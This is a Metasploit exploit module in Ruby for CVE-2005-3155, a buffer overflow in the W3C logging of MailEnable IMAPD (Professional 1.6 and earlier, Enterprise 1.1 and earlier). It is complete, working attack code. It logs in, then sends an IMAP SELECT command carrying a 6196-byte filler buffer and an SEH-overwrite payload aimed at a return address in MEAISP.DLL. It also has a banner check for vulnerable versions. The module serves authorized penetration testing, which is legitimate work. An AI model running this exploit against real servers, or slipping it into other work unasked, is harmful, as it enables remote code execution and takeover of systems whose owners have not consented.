##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Imap
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the W3C logging
          functionality of the MailEnable IMAPD service. Logging is
          not enabled by default and this exploit requires a valid
          username and password to exploit the flaw. MailEnable
          Professional version 1.6 and prior and MailEnable Enterprise
          version 1.1 and prior are affected.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-3155'],
          [ 'OSVDB', '19842'],
          [ 'BID', '15006'],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 600,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] # MEAISP.DLL
        ],
        'DisclosureDate' => '2005-10-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def check
    connect
    disconnect

    if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)
      return Exploit::CheckCode::Appears('MailEnable IMAP version 0-1.54 detected')
    end

    return Exploit::CheckCode::Safe('MailEnable IMAP version 0-1.54 not detected')
  end

  def exploit
    connect_login

    buf = rand_text_alphanumeric(6196, payload_badchars)
    seh = generate_seh_payload(target.ret)
    req = 'a01 SELECT ' + buf + seh + "\r\n"
    sock.put(req)

    handler
    disconnect
  end
end
